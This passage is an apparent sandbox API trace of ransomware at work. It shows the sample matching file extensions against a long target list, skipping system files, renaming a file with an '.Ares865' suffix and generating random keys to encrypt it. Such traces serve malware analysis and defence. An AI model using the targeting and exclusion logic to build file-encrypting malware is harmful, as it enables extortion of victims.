lstrcmpiW (lpString1="rsm", lpString2="dxl") returned 1 [0069.761] lstrlenW (lpString="eco") returned 3 [0069.761] lstrcmpiW (lpString1="rsm", lpString2="eco") returned 1 [0069.762] lstrlenW (lpString="ecx") returned 3 [0069.762] lstrcmpiW (lpString1="rsm", lpString2="ecx") returned 1 [0069.762] lstrlenW (lpString="edb") returned 3 [0069.762] lstrcmpiW (lpString1="rsm", lpString2="edb") returned 1 [0069.762] lstrlenW (lpString="epim") returned 4 [0069.762] lstrcmpiW (lpString1=".rsm", lpString2="epim") returned -1 [0069.762] lstrlenW (lpString="fcd") returned 3 [0069.762] lstrcmpiW (lpString1="rsm", lpString2="fcd") returned 1 [0069.762] lstrlenW (lpString="fdb") returned 3 [0069.762] lstrcmpiW (lpString1="rsm", lpString2="fdb") returned 1 [0069.762] lstrlenW (lpString="fic") returned 3 [0069.762] lstrcmpiW (lpString1="rsm", lpString2="fic") returned 1 [0069.762] lstrlenW (lpString="flexolibrary") returned 12 [0069.762] lstrlenW (lpString="fm5") returned 3 [0069.762] lstrcmpiW (lpString1="rsm", lpString2="fm5") returned 1 [0069.762] lstrlenW (lpString="fmp") returned 3 [0069.762] lstrcmpiW (lpString1="rsm", lpString2="fmp") returned 1 [0069.762] lstrlenW (lpString="fmp12") returned 5 [0069.762] lstrcmpiW (lpString1="e.rsm", lpString2="fmp12") returned -1 [0069.762] lstrlenW (lpString="fmpsl") returned 5 [0069.762] lstrcmpiW (lpString1="e.rsm", lpString2="fmpsl") returned -1 [0069.764] lstrlenW (lpString="fol") returned 3 [0069.764] lstrcmpiW (lpString1="rsm", lpString2="fol") returned 1 [0069.767] lstrlenW (lpString="fp3") returned 3 [0069.767] lstrcmpiW (lpString1="rsm", lpString2="fp3") returned 1 [0069.767] lstrlenW (lpString="fp4") returned 3 [0069.768] lstrcmpiW (lpString1="rsm", lpString2="fp4") returned 1 [0069.768] lstrlenW (lpString="fp5") returned 3 [0069.768] lstrcmpiW (lpString1="rsm", lpString2="fp5") returned 1 [0069.768] lstrlenW (lpString="fp7") returned 3 [0069.768] lstrcmpiW (lpString1="rsm", lpString2="fp7") returned 1 [0069.768] lstrlenW (lpString="fpt") returned 3 [0069.768] lstrcmpiW (lpString1="rsm", lpString2="fpt") returned 1 [0069.768] lstrlenW (lpString="frm") returned 3 [0069.768] lstrcmpiW (lpString1="rsm", lpString2="frm") returned 1 [0069.768] lstrlenW (lpString="gdb") returned 3 [0069.768] lstrcmpiW (lpString1="rsm", lpString2="gdb") returned 1 [0069.768] lstrlenW (lpString="gdb") returned 3 [0069.768] lstrcmpiW (lpString1="rsm", lpString2="gdb") returned 1 [0069.768] lstrlenW (lpString="grdb") returned 4 [0069.768] lstrcmpiW (lpString1=".rsm", lpString2="grdb") returned -1 [0069.768] lstrlenW (lpString="gwi") returned 3 [0069.768] lstrcmpiW (lpString1="rsm", lpString2="gwi") returned 1 [0069.768] lstrlenW (lpString="hdb") returned 3 [0069.768] lstrcmpiW (lpString1="rsm", lpString2="hdb") returned 1 [0069.768] lstrlenW (lpString="his") returned 3 [0069.769] lstrcmpiW (lpString1="rsm", lpString2="his") returned 1 [0069.769] lstrlenW (lpString="ib") returned 2 [0069.769] lstrcmpiW (lpString1="sm", lpString2="ib") returned 1 [0069.769] lstrlenW (lpString="idb") returned 3 [0069.769] lstrcmpiW (lpString1="rsm", lpString2="idb") returned 1 [0069.769] lstrlenW (lpString="ihx") returned 3 [0069.769] lstrcmpiW (lpString1="rsm", lpString2="ihx") returned 1 [0069.769] lstrlenW (lpString="itdb") returned 4 [0069.769] lstrcmpiW (lpString1=".rsm", lpString2="itdb") returned -1 [0069.769] lstrlenW (lpString="itw") returned 3 [0069.769] lstrcmpiW (lpString1="rsm", lpString2="itw") returned 1 [0069.769] lstrlenW (lpString="jet") returned 3 [0069.769] lstrcmpiW (lpString1="rsm", lpString2="jet") returned 1 [0069.769] lstrlenW (lpString="jtx") returned 3 [0069.769] lstrcmpiW (lpString1="rsm", lpString2="jtx") returned 1 [0069.769] lstrlenW (lpString="kdb") returned 3 [0069.769] lstrcmpiW (lpString1="rsm", lpString2="kdb") returned 1 [0069.769] lstrlenW (lpString="kexi") returned 4 [0069.769] lstrcmpiW (lpString1=".rsm", lpString2="kexi") returned -1 [0069.769] lstrlenW (lpString="kexic") returned 5 [0069.769] lstrcmpiW (lpString1="e.rsm", lpString2="kexic") returned -1 [0069.769] lstrlenW (lpString="kexis") returned 5 [0069.769] lstrcmpiW (lpString1="e.rsm", lpString2="kexis") returned -1 [0069.769] lstrlenW (lpString="lgc") returned 3 [0069.769] lstrcmpiW (lpString1="rsm", lpString2="lgc") returned 1 [0069.769] lstrlenW (lpString="lwx") returned 3 [0069.769] lstrcmpiW (lpString1="rsm", lpString2="lwx") returned 1 [0069.769] lstrlenW (lpString="maf") returned 3 [0069.769] lstrcmpiW (lpString1="rsm", lpString2="maf") returned 1 [0069.769] lstrlenW (lpString="maq") returned 3 [0069.769] lstrcmpiW (lpString1="rsm", lpString2="maq") returned 1 [0069.769] lstrlenW (lpString="mar") returned 3 [0069.769] lstrcmpiW (lpString1="rsm", lpString2="mar") returned 1 [0069.769] lstrlenW (lpString="marshal") returned 7 [0069.769] lstrcmpiW (lpString1="ate.rsm", lpString2="marshal") returned -1 [0069.769] lstrlenW (lpString="mas") returned 3 [0069.769] lstrcmpiW (lpString1="rsm", lpString2="mas") returned 1 [0069.769] lstrlenW (lpString="mav") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="mav") returned 1 [0069.770] lstrlenW (lpString="maw") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="maw") returned 1 [0069.770] lstrlenW (lpString="mdbhtml") returned 7 [0069.770] lstrcmpiW (lpString1="ate.rsm", lpString2="mdbhtml") returned -1 [0069.770] lstrlenW (lpString="mdn") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="mdn") returned 1 [0069.770] lstrlenW (lpString="mdt") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="mdt") returned 1 [0069.770] lstrlenW (lpString="mfd") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="mfd") returned 1 [0069.770] lstrlenW (lpString="mpd") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="mpd") returned 1 [0069.770] lstrlenW (lpString="mrg") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="mrg") returned 1 [0069.770] lstrlenW (lpString="mud") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="mud") returned 1 [0069.770] lstrlenW (lpString="mwb") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="mwb") returned 1 [0069.770] lstrlenW (lpString="myd") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="myd") returned 1 [0069.770] lstrlenW (lpString="ndf") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="ndf") returned 1 [0069.770] lstrlenW (lpString="nnt") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="nnt") returned 1 [0069.770] lstrlenW (lpString="nrmlib") returned 6 [0069.770] lstrcmpiW (lpString1="te.rsm", lpString2="nrmlib") returned 1 [0069.770] lstrlenW (lpString="ns2") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="ns2") returned 1 [0069.770] lstrlenW (lpString="ns3") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="ns3") returned 1 [0069.770] lstrlenW (lpString="ns4") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="ns4") returned 1 [0069.770] lstrlenW (lpString="nsf") returned 3 [0069.770] lstrcmpiW (lpString1="rsm", lpString2="nsf") returned 1 [0069.770] lstrlenW (lpString="nv") returned 2 [0069.771] lstrcmpiW (lpString1="sm", lpString2="nv") returned 1 [0069.771] lstrlenW (lpString="nv2") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="nv2") returned 1 [0069.771] lstrlenW (lpString="nwdb") returned 4 [0069.771] lstrcmpiW (lpString1=".rsm", lpString2="nwdb") returned -1 [0069.771] lstrlenW (lpString="nyf") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="nyf") returned 1 [0069.771] lstrlenW (lpString="odb") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="odb") returned 1 [0069.771] lstrlenW (lpString="odb") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="odb") returned 1 [0069.771] lstrlenW (lpString="oqy") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="oqy") returned 1 [0069.771] lstrlenW (lpString="ora") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="ora") returned 1 [0069.771] lstrlenW (lpString="orx") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="orx") returned 1 [0069.771] lstrlenW (lpString="owc") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="owc") returned 1 [0069.771] lstrlenW (lpString="p96") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="p96") returned 1 [0069.771] lstrlenW (lpString="p97") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="p97") returned 1 [0069.771] lstrlenW (lpString="pan") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="pan") returned 1 [0069.771] lstrlenW (lpString="pdb") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="pdb") returned 1 [0069.771] lstrlenW (lpString="pdm") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="pdm") returned 1 [0069.771] lstrlenW (lpString="pnz") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="pnz") returned 1 [0069.771] lstrlenW (lpString="qry") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="qry") returned 1 [0069.771] lstrlenW (lpString="qvd") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="qvd") returned 1 [0069.771] lstrlenW (lpString="rbf") returned 3 [0069.771] lstrcmpiW (lpString1="rsm", lpString2="rbf") returned 1 [0069.772] lstrlenW (lpString="rctd") returned 4 [0069.772] lstrcmpiW (lpString1=".rsm", lpString2="rctd") returned -1 [0069.772] lstrlenW (lpString="rod") returned 3 [0069.772] lstrcmpiW (lpString1="rsm", lpString2="rod") returned 1 [0069.772] lstrlenW (lpString="rodx") returned 4 [0069.772] lstrcmpiW (lpString1=".rsm", lpString2="rodx") returned -1 [0069.772] lstrlenW (lpString="rpd") returned 3 [0069.772] lstrcmpiW (lpString1="rsm", lpString2="rpd") returned 1 [0069.776] lstrlenW (lpString="rsd") returned 3 [0069.776] lstrcmpiW (lpString1="rsm", lpString2="rsd") returned 1 [0069.776] lstrlenW (lpString="sas7bdat") returned 8 [0069.776] lstrcmpiW (lpString1="tate.rsm", lpString2="sas7bdat") returned 1 [0069.776] lstrlenW (lpString="sbf") returned 3 [0069.776] lstrcmpiW (lpString1="rsm", lpString2="sbf") returned -1 [0069.776] lstrlenW (lpString="scx") returned 3 [0069.777] lstrcmpiW (lpString1="rsm", lpString2="scx") returned -1 [0069.777] lstrlenW (lpString="sdb") returned 3 [0069.777] lstrcmpiW (lpString1="rsm", lpString2="sdb") returned -1 [0069.777] lstrlenW (lpString="sdc") returned 3 [0069.777] lstrcmpiW (lpString1="rsm", lpString2="sdc") returned -1 [0069.777] lstrlenW (lpString="sdf") returned 3 [0069.777] lstrcmpiW (lpString1="rsm", lpString2="sdf") returned -1 [0069.777] lstrlenW (lpString="sis") returned 3 [0069.777] lstrcmpiW (lpString1="rsm", lpString2="sis") returned -1 [0069.777] lstrlenW (lpString="spq") returned 3 [0069.777] lstrcmpiW (lpString1="rsm", lpString2="spq") returned -1 [0069.778] lstrlenW (lpString="te") returned 2 [0069.778] lstrcmpiW (lpString1="sm", lpString2="te") returned -1 [0069.778] lstrlenW (lpString="teacher") returned 7 [0069.778] lstrcmpiW (lpString1="ate.rsm", lpString2="teacher") returned -1 [0069.778] lstrlenW (lpString="tmd") returned 3 [0069.779] lstrcmpiW (lpString1="rsm", lpString2="tmd") returned -1 [0069.779] lstrlenW (lpString="tps") returned 3 [0069.780] lstrcmpiW (lpString1="rsm", lpString2="tps") returned -1 [0069.780] lstrlenW (lpString="trc") returned 3 [0069.782] lstrcmpiW (lpString1="rsm", lpString2="trc") returned -1 [0069.782] lstrlenW (lpString="trc") returned 3 [0069.783] lstrcmpiW (lpString1="rsm", lpString2="trc") returned -1 [0069.783] lstrlenW (lpString="trm") returned 3 [0069.783] lstrcmpiW (lpString1="rsm", lpString2="trm") returned -1 [0069.783] lstrlenW (lpString="udb") returned 3 [0069.783] lstrcmpiW (lpString1="rsm", lpString2="udb") returned -1 [0069.783] lstrlenW (lpString="udl") returned 3 [0069.783] lstrcmpiW (lpString1="rsm", lpString2="udl") returned -1 [0069.783] lstrlenW (lpString="usr") returned 3 [0069.788] lstrcmpiW (lpString1="rsm", lpString2="usr") returned -1 [0069.788] lstrlenW (lpString="v12") returned 3 [0069.788] lstrcmpiW (lpString1="rsm", lpString2="v12") returned -1 [0069.788] lstrlenW (lpString="vis") returned 3 [0069.789] lstrcmpiW (lpString1="rsm", lpString2="vis") returned -1 [0069.789] lstrlenW (lpString="vpd") returned 3 [0069.789] lstrcmpiW (lpString1="rsm", lpString2="vpd") returned -1 [0069.789] lstrlenW (lpString="vvv") returned 3 [0069.789] lstrcmpiW (lpString1="rsm", lpString2="vvv") returned -1 [0069.789] lstrlenW (lpString="wdb") returned 3 [0069.789] lstrcmpiW (lpString1="rsm", lpString2="wdb") returned -1 [0069.789] lstrlenW (lpString="wmdb") returned 4 [0069.789] lstrcmpiW (lpString1=".rsm", lpString2="wmdb") returned -1 [0069.789] lstrlenW (lpString="wrk") returned 3 [0069.789] lstrcmpiW (lpString1="rsm", lpString2="wrk") returned -1 [0069.789] lstrlenW (lpString="xdb") returned 3 [0069.789] lstrcmpiW (lpString1="rsm", lpString2="xdb") returned -1 [0069.789] lstrlenW (lpString="xld") returned 3 [0069.789] lstrcmpiW (lpString1="rsm", lpString2="xld") returned -1 [0069.789] lstrlenW (lpString="xmlff") returned 5 [0069.789] lstrcmpiW (lpString1="e.rsm", lpString2="xmlff") returned -1 [0069.789] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.Ares865") returned 89 [0069.789] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.Ares865" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.ares865"), dwFlags=0x1) returned 1 [0069.802] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.Ares865" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0069.802] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=666) returned 1 [0069.802] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0069.803] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0069.803] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0069.803] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0069.804] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0069.804] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.809] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5a0, lpName=0x0) returned 0x164 [0069.821] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5a0) returned 0x190000 [0069.827] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0069.829] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0069.829] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0069.836] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0069.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0069.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0069.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0069.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0069.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0069.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0069.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0069.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0069.838] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0069.838] CloseHandle (hObject=0x164) returned 1 [0069.838] CloseHandle (hObject=0x120) returned 1 [0069.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0069.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0069.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0069.838] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xca64c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xfe5c3760, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0069.838] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0069.838] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="aoldtz.exe") returned 1 [0069.838] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2=".") returned 1 [0069.838] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="..") returned 1 [0069.838] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="windows") returned -1 [0069.838] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="bootmgr") returned 1 [0069.838] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="temp") returned 1 [0069.838] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="pagefile.sys") returned 1 [0069.838] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="boot") returned 1 [0069.838] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="ids.txt") returned 1 [0069.838] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="ntuser.dat") returned 1 [0069.839] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="perflogs") returned 1 [0069.839] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="MSBuild") returned 1 [0069.839] lstrlenW (lpString="vcredist_x86.exe") returned 16 [0069.839] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 81 [0069.839] lstrcpyW (in: lpString1=0x2cce490, lpString2="vcredist_x86.exe" | out: lpString1="vcredist_x86.exe") returned="vcredist_x86.exe" [0069.839] lstrlenW (lpString="vcredist_x86.exe") returned 16 [0069.839] lstrlenW (lpString="Ares865") returned 7 [0069.839] lstrcmpiW (lpString1="x86.exe", lpString2="Ares865") returned 1 [0069.839] lstrlenW (lpString=".dll") returned 4 [0069.839] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2=".dll") returned 1 [0069.839] lstrlenW (lpString=".lnk") returned 4 [0069.839] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2=".lnk") returned 1 [0069.839] lstrlenW (lpString=".ini") returned 4 [0069.839] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2=".ini") returned 1 [0069.839] lstrlenW (lpString=".sys") returned 4 [0069.839] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2=".sys") returned 1 [0069.839] lstrlenW (lpString="vcredist_x86.exe") returned 16 [0069.839] lstrlenW (lpString="bak") returned 3 [0069.839] lstrcmpiW (lpString1="exe", lpString2="bak") returned 1 [0069.839] lstrlenW (lpString="ba_") returned 3 [0069.839] lstrcmpiW (lpString1="exe", lpString2="ba_") returned 1 [0069.839] lstrlenW (lpString="dbb") returned 3 [0069.839] lstrcmpiW (lpString1="exe", lpString2="dbb") returned 1 [0069.839] lstrlenW (lpString="vmdk") returned 4 [0069.839] lstrcmpiW (lpString1=".exe", lpString2="vmdk") returned -1 [0069.839] lstrlenW (lpString="rar") returned 3 [0069.839] lstrcmpiW (lpString1="exe", lpString2="rar") returned -1 [0069.839] lstrlenW (lpString="zip") returned 3 [0069.839] lstrcmpiW (lpString1="exe", lpString2="zip") returned -1 [0069.839] lstrlenW (lpString="tgz") returned 3 [0069.839] lstrcmpiW (lpString1="exe", lpString2="tgz") returned -1 [0069.839] lstrlenW (lpString="vbox") returned 4 [0069.839] lstrcmpiW (lpString1=".exe", lpString2="vbox") returned -1 [0069.839] lstrlenW (lpString="vdi") returned 3 [0069.839] lstrcmpiW (lpString1="exe", lpString2="vdi") returned -1 [0069.839] lstrlenW (lpString="vhd") returned 3 [0069.839] lstrcmpiW (lpString1="exe", lpString2="vhd") returned -1 [0069.839] lstrlenW (lpString="vhdx") returned 4 [0069.840] lstrcmpiW (lpString1=".exe", lpString2="vhdx") returned -1 [0069.840] lstrlenW (lpString="avhd") returned 4 [0069.840] lstrcmpiW (lpString1=".exe", lpString2="avhd") returned -1 [0069.840] lstrlenW (lpString="db") returned 2 [0069.840] lstrcmpiW (lpString1="xe", lpString2="db") returned 1 [0069.840] lstrlenW (lpString="db2") returned 3 [0069.840] lstrcmpiW (lpString1="exe", lpString2="db2") returned 1 [0069.840] lstrlenW (lpString="db3") returned 3 [0069.840] lstrcmpiW (lpString1="exe", lpString2="db3") returned 1 [0069.840] lstrlenW (lpString="dbf") returned 3 [0069.840] lstrcmpiW (lpString1="exe", lpString2="dbf") returned 1 [0069.840] lstrlenW (lpString="mdf") returned 3 [0069.840] lstrcmpiW (lpString1="exe", lpString2="mdf") returned -1 [0069.840] lstrlenW (lpString="mdb") returned 3 [0069.840] lstrcmpiW (lpString1="exe", lpString2="mdb") returned -1 [0069.840] lstrlenW (lpString="sql") returned 3 [0069.840] lstrcmpiW (lpString1="exe", lpString2="sql") returned -1 [0069.840] lstrlenW (lpString="sqlite") returned 6 [0069.840] lstrcmpiW (lpString1="86.exe", lpString2="sqlite") returned -1 [0069.840] lstrlenW (lpString="sqlite3") returned 7 [0069.840] lstrcmpiW (lpString1="x86.exe", lpString2="sqlite3") returned 1 [0069.840] lstrlenW (lpString="sqlitedb") returned 8 [0069.840] lstrcmpiW (lpString1="_x86.exe", lpString2="sqlitedb") returned -1 [0069.840] lstrlenW (lpString="xml") returned 3 [0069.840] lstrcmpiW (lpString1="exe", lpString2="xml") returned -1 [0069.840] lstrlenW (lpString="$er") returned 3 [0069.840] lstrcmpiW (lpString1="exe", lpString2="$er") returned 1 [0069.840] lstrlenW (lpString="4dd") returned 3 [0069.840] lstrcmpiW (lpString1="exe", lpString2="4dd") returned 1 [0069.840] lstrlenW (lpString="4dl") returned 3 [0069.840] lstrcmpiW (lpString1="exe", lpString2="4dl") returned 1 [0069.840] lstrlenW (lpString="^^^") returned 3 [0069.840] lstrcmpiW (lpString1="exe", lpString2="^^^") returned 1 [0069.840] lstrlenW (lpString="abs") returned 3 [0069.840] lstrcmpiW (lpString1="exe", lpString2="abs") returned 1 [0069.840] lstrlenW (lpString="abx") returned 3 [0069.840] lstrcmpiW (lpString1="exe", lpString2="abx") returned 1 [0069.840] lstrlenW (lpString="accdb") returned 5 [0069.840] lstrcmpiW (lpString1="6.exe", lpString2="accdb") returned -1 [0069.841] lstrlenW (lpString="accdc") returned 5 [0069.841] lstrcmpiW (lpString1="6.exe", lpString2="accdc") returned -1 [0069.841] lstrlenW (lpString="accde") returned 5 [0069.841] lstrcmpiW (lpString1="6.exe", lpString2="accde") returned -1 [0069.841] lstrlenW (lpString="accdr") returned 5 [0069.841] lstrcmpiW (lpString1="6.exe", lpString2="accdr") returned -1 [0069.841] lstrlenW (lpString="accdt") returned 5 [0069.841] lstrcmpiW (lpString1="6.exe", lpString2="accdt") returned -1 [0069.841] lstrlenW (lpString="accdw") returned 5 [0069.841] lstrcmpiW (lpString1="6.exe", lpString2="accdw") returned -1 [0069.841] lstrlenW (lpString="accft") returned 5 [0069.841] lstrcmpiW (lpString1="6.exe", lpString2="accft") returned -1 [0069.841] lstrlenW (lpString="adb") returned 3 [0069.841] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0069.841] lstrlenW (lpString="adb") returned 3 [0069.841] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0069.841] lstrlenW (lpString="ade") returned 3 [0069.841] lstrcmpiW (lpString1="exe", lpString2="ade") returned 1 [0069.841] lstrlenW (lpString="adf") returned 3 [0069.841] lstrcmpiW (lpString1="exe", lpString2="adf") returned 1 [0069.841] lstrlenW (lpString="adn") returned 3 [0069.841] lstrcmpiW (lpString1="exe", lpString2="adn") returned 1 [0069.841] lstrlenW (lpString="adp") returned 3 [0069.841] lstrcmpiW (lpString1="exe", lpString2="adp") returned 1 [0069.841] lstrlenW (lpString="alf") returned 3 [0069.841] lstrcmpiW (lpString1="exe", lpString2="alf") returned 1 [0069.841] lstrlenW (lpString="ask") returned 3 [0069.841] lstrcmpiW (lpString1="exe", lpString2="ask") returned 1 [0069.841] lstrlenW (lpString="btr") returned 3 [0069.841] lstrcmpiW (lpString1="exe", lpString2="btr") returned 1 [0069.841] lstrlenW (lpString="cat") returned 3 [0069.841] lstrcmpiW (lpString1="exe", lpString2="cat") returned 1 [0069.841] lstrlenW (lpString="cdb") returned 3 [0069.841] lstrcmpiW (lpString1="exe", lpString2="cdb") returned 1 [0069.841] lstrlenW (lpString="ckp") returned 3 [0069.841] lstrcmpiW (lpString1="exe", lpString2="ckp") returned 1 [0069.841] lstrlenW (lpString="cma") returned 3 [0069.841] lstrcmpiW (lpString1="exe", lpString2="cma") returned 1 [0069.841] lstrlenW (lpString="cpd") returned 3 [0069.842] lstrcmpiW (lpString1="exe", lpString2="cpd") returned 1 [0069.842] lstrlenW (lpString="dacpac") returned 6 [0069.842] lstrcmpiW (lpString1="86.exe", lpString2="dacpac") returned -1 [0069.842] lstrlenW (lpString="dad") returned 3 [0069.842] lstrcmpiW (lpString1="exe", lpString2="dad") returned 1 [0069.842] lstrlenW (lpString="dadiagrams") returned 10 [0069.842] lstrcmpiW (lpString1="st_x86.exe", lpString2="dadiagrams") returned 1 [0069.842] lstrlenW (lpString="daschema") returned 8 [0069.842] lstrcmpiW (lpString1="_x86.exe", lpString2="daschema") returned -1 [0069.842] lstrlenW (lpString="db-journal") returned 10 [0069.842] lstrcmpiW (lpString1="st_x86.exe", lpString2="db-journal") returned 1 [0069.842] lstrlenW (lpString="db-shm") returned 6 [0069.842] lstrcmpiW (lpString1="86.exe", lpString2="db-shm") returned -1 [0069.842] lstrlenW (lpString="db-wal") returned 6 [0069.842] lstrcmpiW (lpString1="86.exe", lpString2="db-wal") returned -1 [0069.842] lstrlenW (lpString="dbc") returned 3 [0069.842] lstrcmpiW (lpString1="exe", lpString2="dbc") returned 1 [0069.842] lstrlenW (lpString="dbs") returned 3 [0069.842] lstrcmpiW (lpString1="exe", lpString2="dbs") returned 1 [0069.842] lstrlenW (lpString="dbt") returned 3 [0069.842] lstrcmpiW (lpString1="exe", lpString2="dbt") returned 1 [0069.842] lstrlenW (lpString="dbv") returned 